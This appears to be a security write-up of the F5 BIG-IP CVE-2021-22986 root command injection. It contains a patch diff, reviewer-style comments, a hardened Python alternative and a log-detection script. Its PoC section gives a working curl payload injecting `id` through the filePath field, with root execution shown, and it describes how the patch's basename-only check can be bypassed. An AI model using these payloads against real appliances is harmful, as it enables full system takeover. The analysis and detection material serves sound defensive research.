This vulnerability allows unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. The vulnerability can only be exploited through the control plane, not the data plane. Exploitation can lead to complete system compromise. BIG-IP systems in Appliance mode are also vulnerable.
CVE-2021-22986
From the patch analysis and testing, this vulnerability appears to involve some sort of authentication bypass and possibly even SSRF. The full-context patch below has had its line numbers adjusted for use in a debugger.
RCE
This is a post-auth root command injection in the tar(1) command.
Patch
Filtering is applied to the user-controlled taskState.filePath parameter.
[snip]
+ private static final Pattern validFilePathChars = Pattern.compile("(^[a-zA-Z][a-zA-Z0-9_.\-\s()]*)\.([tT][aA][rR]\.[gG][zZ])$");
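Review bot: the new validFilePathChars pattern admits whitespace (`\s`) inside the name, yet the value is later placed unquoted on a shell command line, so a name such as `a b.tar.gz` splits into two tar arguments; drop `\s` from the character class or quote/argv the argument at the call site. As pasted, the literal also uses single backslashes (`\-`, `\s`, `\.`), which would not compile as a Java string; they must be doubled (`\\-`, `\\s`, `\\.`) unless this is decompiler output.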
[snip]
private void validateGzipBundle(final IAppBundleInstallTaskState taskState) {
if (Utilities.isNullOrEmpty(taskState.filePath)) {
File agcUseCasePackDir = new File("/var/apm/f5-iappslx-agc-usecase-pack/");
if (!agcUseCasePackDir.exists() || !agcUseCasePackDir.isDirectory()) {
String error = "Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.";
failTask(taskState, error, "");
return;
}
File[] agcUseCasePack = agcUseCasePackDir.listFiles();
if (agcUseCasePack == null || agcUseCasePack.length == 0 || !agcUseCasePack[0].isFile()) {
String error = "Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.";
failTask(taskState, error, "");
return;
}
taskState.filePath = agcUseCasePack[0].getPath();
}
+ String filename = taskState.filePath.substring(taskState.filePath.lastIndexOf('/') + 1);
+ Matcher m = validFilePathChars.matcher(filename);
+ if (!m.matches()) {
+ String errorMessage = String.format("Access Guided Configuration use case pack validation failed: the file name %s must begin with alphabet, and only contain letters, numbers, spaces and/or special characters (underscore (_), period (.), hyphen (-) and round brackets ()). Only a .tar.gz file is allowed", new Object[] { filename });
+
+
+
+ failTask(taskState, errorMessage, "");
+
+ return;
+ }
final String extractTarCommand = "tar -xf " + taskState.filePath + " -O > /dev/null";
ShellExecutor extractTar = new ShellExecutor(extractTarCommand);
CompletionHandler<ShellExecutionResult> executionFinishedHandler = new CompletionHandler<ShellExecutionResult>()
{
public void completed(ShellExecutionResult extractQueryResult)
{
if (extractQueryResult.getExitStatus().intValue() != 0) {
String error = extractTarCommand + " failed with exit code=" + extractQueryResult.getExitStatus();
IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, "Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.", error + "stdout + stderr=" + extractQueryResult.getOutput());
return;
}
taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.QUERY_INSTALLED_RPM;
IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);
}
public void failed(Exception ex, ShellExecutionResult rpmQueryResult) {
IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, "Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.", String.format("%s failed", new Object[] { this.val$extractTarCommand }) + RestHelper.throwableStackToString(ex));
}
};
extractTar.startExecution(executionFinishedHandler);
}
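Review bot: the check at `String filename = taskState.filePath.substring(taskState.filePath.lastIndexOf('/') + 1);` validates only the basename, while the whole of taskState.filePath is still concatenated into `"tar -xf " + taskState.filePath + " -O > /dev/null"` and handed to ShellExecutor, so the directory portion before the last '/' reaches the shell unvalidated and unquoted. Validate the full path instead (canonicalize it, confine it to /var/apm/f5-iappslx-agc-usecase-pack/, then apply the pattern to the result) and build the command as an argument list rather than a string so that no shell parses it; the fallback path taken from agcUseCasePack[0].getPath() would pass the same check unchanged.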
[snip]
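To make the patch's behaviour concrete, here is an added Python example (not F5's code and not from the original post) that re-implements the basename check the hunk introduces, shows which inputs it accepts and rejects, and contrasts the string-built shell command with a shell-free, argv-based alternative that also confines the path to the upload directory. The function names are hypothetical; the directory is the one the worker itself falls back to (/var/apm/f5-iappslx-agc-usecase-pack/).

```python
"""Added example, not F5's code: models the patch's basename check and a
shell-free alternative. Function names are hypothetical; ALLOWED_DIR is the
fallback directory the worker uses."""
import posixpath
import re
import shutil
import subprocess
from typing import List, Optional

# Python translation of the patch's validFilePathChars. Java's matches()
# anchors both ends of the string, so fullmatch() is the equivalent.
VALID_FILE_PATH_CHARS = re.compile(
    r"(^[a-zA-Z][a-zA-Z0-9_.\-\s()]*)\.([tT][aA][rR]\.[gG][zZ])$"
)
ALLOWED_DIR = "/var/apm/f5-iappslx-agc-usecase-pack"
# Characters that only matter because a shell interprets the command line.
SHELL_META = "`$;|&<>\n'\"\\"


def build_vulnerable_command(file_path: str) -> str:
    """Pre-patch shape: the user-controlled path is pasted into a string that
    ShellExecutor hands to a shell, so backticks and $(...) run as root."""
    return "tar -xf " + file_path + " -O > /dev/null"


def basename_passes_patch_check(file_path: str) -> bool:
    """Mirror of the hunk: only the text after the last '/' is validated."""
    filename = file_path[file_path.rfind("/") + 1:]
    return VALID_FILE_PATH_CHARS.fullmatch(filename) is not None


def safe_tar_argv(file_path: str) -> Optional[List[str]]:
    """Hardened form (added here, hypothetical): canonicalize, confine to
    ALLOWED_DIR, apply the filename rule, refuse shell metacharacters anywhere
    in the path, and return an argv list so no shell is involved at all."""
    full = posixpath.normpath(posixpath.join(ALLOWED_DIR, file_path))
    if not full.startswith(ALLOWED_DIR + "/"):
        return None  # absolute path or ../ escape out of the upload directory
    if VALID_FILE_PATH_CHARS.fullmatch(posixpath.basename(full)) is None:
        return None  # same filename rule as the patch
    if any(c in SHELL_META for c in full):
        return None  # the directory part is checked too, unlike the patch
    return ["tar", "-xf", full, "-O"]


def run_shell_free(argv: List[str]) -> Optional[int]:
    """Execute with a list: subprocess.run never invokes /bin/sh here, so any
    metacharacter that slipped through would be a literal byte in argv."""
    if shutil.which(argv[0]) is None:
        return None  # tar not installed on this host; nothing to run
    return subprocess.run(argv, stdout=subprocess.DEVNULL,
                          stderr=subprocess.DEVNULL).returncode


if __name__ == "__main__":
    for p in ["`id`", "pack.tar.gz", "`id`/pack.tar.gz", "../../etc/shadow"]:
        print(repr(p), "patch-check:", basename_passes_patch_check(p),
              "argv:", safe_tar_argv(p))
```

The PoC payload "`id`" is rejected by the patch's regex, but because only the basename is examined, a value with the same payload in the directory part ("`id`/pack.tar.gz") passes that check as written; the argv-based variant rejects it, and even if it did not, a list passed to subprocess.run is never parsed by a shell.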
PoC
The affected endpoint is /mgmt/tm/access/bundle-install-tasks.
wvu:~$ curl -ksu admin:[redacted] https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"`id`"}' | jq .
{
"filePath": "`id`",
"toBeInstalledAppRpmsIndex": -1,
"id": "36671f83-d1be-4f5a-a2e6-7f9442a2a76f",
"status": "CREATED",
"userReference": {
"link": "https://localhost/mgmt/shared/authz/users/admin"
},
"identityReferences": [
{
"link": "https://localhost/mgmt/shared/authz/users/admin"
}
],
"ownerMachineId": "ac2562f0-e41f-4652-ba35-6a2b804b235e",
"generation": 1,
"lastUpdateMicros": 1615930477819656,
"kind": "tm:access:bundle-install-tasks:iappbundleinstalltaskstate",
"selfLink": "https://localhost/mgmt/tm/access/bundle-install-tasks/36671f83-d1be-4f5a-a2e6-7f9442a2a76f"
}
wvu:~$
The id(1) command executes as root:
execve("/bin/tar", ["tar", "-xf", "uid=0(root)", "gid=0(root)", "groups=0(root)", "context=system_u:system_r:initrc_t:s0", "-O"], [/* 9 vars */]) = 0
An error may appear in /var/log/restjavad.0.log:
[SEVERE][10029][16 Mar 2021 21:34:37 UTC][8100/tm/access/bundle-install-tasks IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive. error details: tar -xf `id` -O > /dev/null failedorg.apache.commons.exec.ExecuteException: Process exited with an error: 2 (Exit value: 2)
at org.apache.commons.exec.DefaultExecutor.executeInternal(DefaultExecutor.java:404)
at org.apache.commons.exec.DefaultExecutor.access$200(DefaultExecutor.java:48)
at org.apache.commons.exec.DefaultExecutor$1.run(DefaultExecutor.java:200)
at java.lang.Thread.run(Thread.java:748)
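The failure above is also a detection opportunity: the worker logs the exact command line it ran, including the attacker-supplied path. The following is an added example (not from the original post or from F5) that scans restjavad log lines for failed bundle-install tar runs whose path contains shell metacharacters. The sample lines are constructed; the first mirrors the log line shown above, and the field layout assumed for the other lines follows it.

```python
"""Added detection example, not part of the original post: flag failed
bundle-install tar runs whose path carries shell metacharacters."""
import re
from typing import Dict, Iterable, List

# [LEVEL][pid][timestamp][worker] message
LOG_LINE = re.compile(
    r"^\[(?P<level>[A-Z]+)\]\[(?P<pid>\d+)\]\[(?P<ts>[^\]]+)\]"
    r"\[(?P<worker>[^\]]+)\] (?P<msg>.*)$"
)
# The worker logs the command verbatim; the path sits between
# "tar -xf " and " -O > /dev/null" (non-greedy so stray '>' in the
# payload does not swallow the rest of the message).
TAR_CMD = re.compile(r"tar -xf (?P<path>.*?) -O > /dev/null")
# Characters that show the value was interpreted by /bin/sh rather than tar.
# Parentheses are left out because the patch's filename rule allows them.
SHELL_META = "`$;|&<>\n"

# Constructed sample log; line 1 mirrors the one shown in the article.
SAMPLE_LOG = [
    "[SEVERE][10029][16 Mar 2021 21:34:37 UTC][8100/tm/access/bundle-install-tasks "
    "IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please "
    "ensure that usecase pack is a valid tar archive. error details: tar -xf `id` -O > "
    "/dev/null failedorg.apache.commons.exec.ExecuteException: Process exited with an "
    "error: 2 (Exit value: 2)",
    "[SEVERE][10029][16 Mar 2021 21:40:02 UTC][8100/tm/access/bundle-install-tasks "
    "IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please "
    "ensure that usecase pack is a valid tar archive. error details: tar -xf "
    "/var/apm/f5-iappslx-agc-usecase-pack/pack.tar.gz -O > /dev/null failed with exit "
    "code=2stdout + stderr=tar: This does not look like a tar archive",
    "[SEVERE][10029][16 Mar 2021 21:41:15 UTC][8100/tm/access/bundle-install-tasks "
    "IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please "
    "ensure that usecase pack is a valid tar archive. error details: tar -xf "
    "$(id>/tmp/o) -O > /dev/null failedorg.apache.commons.exec.ExecuteException: "
    "Process exited with an error: 2 (Exit value: 2)",
    "[INFO][10029][16 Mar 2021 21:41:16 UTC][8100/shared/authz/users "
    "UserCollectionWorker] user admin authenticated",
]


def scan_restjavad(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one finding per bundle-install tar failure whose path contains
    shell metacharacters. Benign archive failures are not reported."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or "bundle-install-tasks" not in m.group("worker"):
            continue
        cmd = TAR_CMD.search(m.group("msg"))
        if not cmd:
            continue
        path = cmd.group("path")
        hits = sorted({c for c in path if c in SHELL_META})
        if hits:
            findings.append({
                "ts": m.group("ts"),
                "pid": m.group("pid"),
                "path": path,
                "meta": "".join(hits),
            })
    return findings


if __name__ == "__main__":
    for f in scan_restjavad(SAMPLE_LOG):
        print(f["ts"], "pid", f["pid"], "suspicious filePath:", repr(f["path"]),
              "metachars:", f["meta"])
```

Note that after the patch a backtick payload is rejected before tar runs, so this pattern catches pre-patch attempts and any attempt that still reaches the shell; a successful injection on an unpatched box may leave no tar error at all if the substituted command output happens to parse, so pair it with process-execution monitoring for children of restjavad, as the strace line above illustrates.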
RCE update
Rich Warren has built a full RCE chain using the SSRF!
References:
https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
This article was first published on the WeChat public account Khan安全攻防实验室: CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site bears no legal or joint liability. For questions, contact us by email (use a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).